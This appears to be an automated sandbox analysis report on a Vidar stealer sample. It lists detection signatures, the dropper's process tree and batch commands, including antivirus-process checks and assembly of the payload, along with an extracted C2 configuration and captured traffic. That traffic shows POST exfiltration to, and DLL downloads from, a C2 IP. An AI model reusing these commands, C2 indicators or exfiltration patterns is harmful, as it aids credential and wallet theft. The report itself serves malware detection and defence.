
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1501386
MD5: 2f5226b4116ce79afb6dcb32fa647954
SHA1: 15f395c9a4a894a660d318a6779094d311f0a1f7
SHA256: 8febc589fc4de7b009d3e406fddba66e389d5544bc5fad44d03f712ebf6c2bfa
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2F5226B4116CE79AFB6DCB32FA647954)
    • cmd.exe (PID: 4028 cmdline: "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3732 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5556 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4612 cmdline: cmd /c md 271973 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 2460 cmdline: findstr /V "NorwegianLivedJerseyRelaxation" Para MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2220 cmdline: cmd /c copy /b ..\Ventures + ..\Thousands + ..\Enhance + ..\Kept + ..\Everything + ..\Say C MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Tenant.pif (PID: 2260 cmdline: Tenant.pif C MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • WerFault.exe (PID: 5256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3264 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • choice.exe (PID: 1084 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Malware configuration: {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "283e465e3e8feb6cb806690b98c9bf31"}

Yara matches (network capture)
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
0000000B.00000002.4068394882.0000000000151000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.3255083848.0000000001790000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.3254895213.0000000001511000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
11.2.Tenant.pif.150000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Tenant.pif.150000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x1ca20:$s1: JohnDoe
  • 0x1ca28:$s2: HAL9TH
11.2.Tenant.pif.13e3318.3.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Tenant.pif.13e3318.3.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x1ca20:$s1: JohnDoe
  • 0x1ca28:$s2: HAL9TH
11.2.Tenant.pif.13e3318.3.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

System Summary

Sigma match
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: Tenant.pif C, CommandLine: Tenant.pif C, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Cashiers Cashiers.bat & Cashiers.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4028, ParentProcessName: cmd.exe, ProcessCommandLine: Tenant.pif C, ProcessId: 2260, ProcessName: Tenant.pif
Suricata IDS alerts
Timestamp                       | SID     | Severity | Src Port | Dst Port | Protocol | Classtype
2024-08-29T20:49:45.709612+0200 | 2028765 | 3        | 59952    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:55.420274+0200 | 2028765 | 3        | 59957    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:22.722325+0200 | 2028765 | 3        | 59938    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:27.286287+0200 | 2044247 | 1        | 443      | 59941    | TCP      | Malware Command and Control Activity Detected
2024-08-29T20:50:03.661659+0200 | 2054495 | 1        | 59961    | 80       | TCP      | A Network Trojan was detected
2024-08-29T20:49:29.365044+0200 | 2028765 | 3        | 59943    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:52.374206+0200 | 2028765 | 3        | 59955    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:34.489806+0200 | 2028765 | 3        | 59945    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:51.411352+0200 | 2028765 | 3        | 59954    | 443      | TCP      | Unknown Traffic
2024-08-29T20:50:01.060380+0200 | 2028765 | 3        | 59960    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:27.945326+0200 | 2028765 | 3        | 59942    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:23.881214+0200 | 2028765 | 3        | 59939    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:26.574584+0200 | 2028765 | 3        | 59941    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:30.969182+0200 | 2028765 | 3        | 59944    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:37.787326+0200 | 2028765 | 3        | 59948    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:58.900576+0200 | 2028765 | 3        | 59959    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:42.053985+0200 | 2028765 | 3        | 59950    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:36.478659+0200 | 2028765 | 3        | 59947    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:56.817977+0200 | 2028765 | 3        | 59958    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:47.284094+0200 | 2028765 | 3        | 59953    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:25.234179+0200 | 2028765 | 3        | 59940    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:35.389430+0200 | 2028765 | 3        | 59946    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:28.638207+0200 | 2049087 | 1        | 59942    | 443      | TCP      | A Network Trojan was detected
2024-08-29T20:49:28.638383+0200 | 2051831 | 1        | 443      | 59942    | TCP      | Malware Command and Control Activity Detected
2024-08-29T20:49:39.983960+0200 | 2028765 | 3        | 59949    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:43.989360+0200 | 2028765 | 3        | 59951    | 443      | TCP      | Unknown Traffic
2024-08-29T20:49:53.730356+0200 | 2028765 | 3        | 59956    | 443      | TCP      | Unknown Traffic


AV Detection

Source: https://steamcommunity.com/profiles/76561199761128941 | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/nss3.dll | Avira URL Cloud: Label: malware
Source: https://t.me/iyigunl | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/vcruntime140.dllCz | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/sqlr.dll | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/ | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199761128941/badges | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/softokn3.dlle | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/nss3.dllKEBKJD-journal | Avira URL Cloud: Label: malware
Source: https://94.130.188.148 | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199761128941/inventory/ | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/mozglue.dllq | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/sqlr.dll1 | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/msvcp140.dll | Avira URL Cloud: Label: malware
Source: https://94.130.188.148/msvcp140.dllI | Avira URL Cloud: Label: malware
Source: 0000000B.00000003.3255137862.0000000004522000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199761128941"], "Botnet": "283e465e3e8feb6cb806690b98c9bf31"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 86.2% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:59937 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 94.130.188.148:443 -> 192.168.2.5:59938 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb | source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
Source: Binary string: mozglue.pdbP | source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
Source: Binary string: freebl3.pdbp | source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
Source: Binary string: nss3.pdb@ | source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
Source: Binary string: softokn3.pdb@ | source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: Tenant.pif, 0000000B.00000002.4090409721.000000002B265000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: Tenant.pif, 0000000B.00000002.4085470552.000000001F389000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
Source: Binary string: nss3.pdb | source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb | source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb | source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
Source: Binary string: softokn3.pdb | source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B04005
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0C2FF
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00B0494A
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00B0CD9F
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0CD14 FindFirstFileW,FindClose,11_2_00B0CD14
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F5D8
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F735
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0FA36
Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif | Code function: 11_2_00B03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B03CE2
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\271973\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\271973

Networking

                    Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:59961 -> 95.164.119.162:80
                    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:59942 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.148:443 -> 192.168.2.5:59942
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.148:443 -> 192.168.2.5:59941
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199761128941
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199761128941 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 95.164.119.162 95.164.119.162
                    Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
                    Source: Joe Sandbox ViewIP Address: 94.130.188.148 94.130.188.148
                    Source: Joe Sandbox ViewASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
                    Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
                    Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59941 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59944 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59940 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59938 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59942 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59943 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59939 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59946 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59945 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59948 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59947 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59949 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59950 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59951 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59952 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59953 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59954 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59958 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59955 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59959 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59957 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59956 -> 94.130.188.148:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:59960 -> 94.130.188.148:443
                    Source: global traffic | HTTP traffic detected:
                        GET / HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 254
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 331
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 332
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 6797
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /sqlr.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 829
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----CBKJJJDHDGDAAKECAKJD
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 437
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        POST / HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Content-Length: 437
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /freebl3.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /mozglue.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /msvcp140.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /softokn3.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /vcruntime140.dll HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                        Host: 94.130.188.148
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected:
                        GET /nss3.dll HTTP/1.1
